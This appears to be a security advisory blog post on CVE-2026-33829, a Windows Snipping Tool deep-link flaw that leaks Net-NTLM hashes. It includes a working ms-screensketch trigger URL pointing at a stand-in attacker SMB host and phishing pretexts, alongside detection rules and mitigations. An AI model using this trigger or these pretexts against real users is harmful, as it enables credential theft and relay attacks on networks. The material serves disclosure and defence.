CVE-2026-33829: How a Deep Link in Windows Can Expose Net-NTLM Credentials

CVE-2026-33829: How a Deep Link in Windows Can Expose Net-NTLM Credentials

Original text by Alisa Belousova

Introduction

In April 2026 Microsoft patched CVE-2026-33829, a vulnerability in the Windows Snipping Tool that allows remote attackers to capture Net-NTLM authentication responses from users.

The flaw is triggered through a deep-link protocol handler registered by the application. By abusing the ms-screensketchURI scheme, an attacker can force the Snipping Tool to attempt loading a file from a remote SMB path. When this happens, Windows automatically attempts NTLM authentication, potentially exposing the user’s Net-NTLM hash to an attacker-controlled server.

Although the vulnerability does not directly execute code or escalate privileges, credential leakage remains one of the most valuable primitives in Windows environments. Net-NTLM hashes can often be cracked offline or relayed to other services, enabling lateral movement inside corporate networks.

Executive Summary

ItemDescription
VulnerabilityCVE-2026-33829
ComponentWindows Snipping Tool
Issue TypeNTLM credential disclosure
Attack VectorDeep link / URI scheme abuse
User InteractionRequired
ImpactNet-NTLM hash leakage
PatchMicrosoft April 2026 security update

Background: Deep Links in Windows Applications

Modern Windows apps can register protocol handlers that allow them to be launched through special URIs.

Example:

zoommtg://
ms-settings:
ms-teams:

These handlers are registered in the application manifest.

In this case, the Snipping Tool registers the following protocol:

ms-screensketch

From the application manifest:

<uap:Extension Category="windows.protocol">
    <uap:Protocol Name="ms-screensketch" DesiredView="default"/>
</uap:Extension>

This allows external applications, browsers, or documents to open the Snipping Tool using URLs.

Root Cause of the Vulnerability

The vulnerability exists because the filePath parameter passed to the ms-screensketch protocol is not properly validated.

The application accepts a remote UNC path:

\\attacker-server\file.png

When Snipping Tool attempts to open this resource, Windows performs an SMB connection to the remote server.

During this connection Windows automatically sends NTLM authentication, exposing a Net-NTLM challenge-response.

Vulnerability Flow

Attacker Website
      │
      │ malicious link
      ▼
Victim Browser
      │
      │ deep link
      ▼
ms-screensketch protocol
      │
      │ Snipping Tool launches
      ▼
Remote file path requested
      │
      │ SMB authentication
      ▼
Attacker SMB Server
      │
      ▼
Net-NTLM hash captured

Attack Chain Diagram

+-------------------+
| Attacker Website  |
+-------------------+
          |
          | malicious link
          v
+----------------------+
| Browser / Email App  |
+----------------------+
          |
          | ms-screensketch URI
          v
+----------------------+
| Snipping Tool Launch |
+----------------------+
          |
          | UNC file path
          v
+----------------------+
| SMB Authentication   |
| (NTLM Challenge)     |
+----------------------+
          |
          v
+----------------------+
| Attacker SMB Server  |
| Net-NTLM Hash Leak   |
+----------------------+

Example Trigger URL

A malicious page may trigger the vulnerability using a deep link such as:

ms-screensketch:edit?&filePath=\\attacker\file.png&isTemporary=false&saved=true&source=Toast

When the victim opens this link:

  1. The Snipping Tool launches.
  2. The application attempts to open the remote file.
  3. Windows performs SMB authentication.
  4. The attacker captures the Net-NTLM response.

Social Engineering Scenarios

Because the Snipping Tool actually opens when the URI is triggered, attackers can craft convincing pretexts.

Examples include:

ScenarioDescription
Corporate wallpaperVictim is asked to crop a new company wallpaper
Employee badgeVictim edits their ID photo
HR documentVictim reviews an image attachment
Support requestIT sends a screenshot editing request

The victim sees the Snipping Tool open normally, while the NTLM authentication occurs silently in the background.

Attack Diagram (Realistic Scenario)

Phishing Email
      │
      │ "Please crop your new ID photo"
      ▼
User clicks link
      │
      ▼
Browser loads attacker page
      │
      │ auto-trigger deep link
      ▼
Snipping Tool opens
      │
      │ attempts to load remote image
      ▼
SMB request to attacker server
      │
      ▼
NTLM challenge/response leaked

Why NTLM Leaks Matter

Leaking NTLM authentication material can enable multiple follow-on attacks.

1. Offline Password Cracking

Captured Net-NTLM hashes may be cracked using tools like:

  • Hashcat
  • John the Ripper

If the password is weak, attackers can recover plaintext credentials.

2. NTLM Relay

Instead of cracking the hash, attackers may relay authentication to other services.

Example targets:

SMB
LDAP
HTTP
Exchange
AD CS

This can allow attackers to:

  • authenticate as the victim
  • create machine accounts
  • enroll certificates
  • escalate privileges

3. Lateral Movement

Once credentials are obtained, attackers may move laterally through the network.

Typical chain:

NTLM leak
     │
     ▼
credential crack or relay
     │
     ▼
domain access
     │
     ▼
privilege escalation

Detection and Blue Team Guidance

SOC teams should monitor for abnormal SMB authentication patterns originating from user workstations.

Detection Signals

1. Outbound SMB to Untrusted Hosts

Alert when SMB traffic goes to unknown internet hosts.

Indicators:

TCP 445 outbound
UNC paths to external domains
DNS names resembling attacker infrastructure

2. Snipping Tool Triggered by Browser

Look for process chains like:

browser.exe
   └── SnippingTool.exe

This behavior is unusual in normal workflows.

3. Suspicious Protocol Invocation

Monitoring tools may capture deep link usage:

ms-screensketch:

Unexpected invocations should be investigated.

4. NTLM Authentication to External Servers

Log sources:

  • Windows Security Logs
  • Defender for Endpoint
  • SMB telemetry
  • Network IDS

Look for authentication attempts to hosts outside the corporate network.

Example Detection Logic

Example SOC rule concept:

IF process = SnippingTool.exe
AND parent_process IN (browser, outlook)
AND network_connection = SMB
AND destination NOT internal_network
THEN alert

Defender / EDR Telemetry

Important signals to monitor:

TelemetryIndicator
Process creationSnippingTool launched by browser
Network logsoutbound SMB
SMB authenticationNTLM challenge responses
DNSattacker infrastructure domains

Mitigation

The vulnerability was fixed by Microsoft in the April 14, 2026 security update.

Administrators should:

  1. Install the April 2026 security updates.
  2. Disable NTLM where possible.
  3. Block outbound SMB traffic to the internet.
  4. Monitor unusual Snipping Tool activity.

Hardening Recommendations

Security teams should implement:

Network Controls

Block outbound SMB:

TCP 445
TCP 139

NTLM Restrictions

Use Group Policy:

Network security: Restrict NTLM

Email Filtering

Block links containing unusual protocol handlers.

Browser Security

Disable automatic protocol invocation where possible.

Disclosure Timeline

DateEvent
2026-03-23Vulnerability reported to Microsoft
2026-04-14Security patch released
2026-04-14Public disclosure

Final Thoughts

CVE-2026-33829 highlights a recurring security pattern in modern operating systems:

application deep links interacting with network resources.

When protocol handlers accept external parameters without proper validation, they may inadvertently trigger authentication mechanisms or network connections.

Although this vulnerability only leaks NTLM authentication material, such leaks remain extremely valuable to attackers, especially inside corporate environments where credential reuse and NTLM relay attacks remain common.

Organizations should treat NTLM leaks as high-impact security events and ensure that monitoring, network restrictions, and patch management policies are in place to mitigate similar issues in the future.

Comments are closed.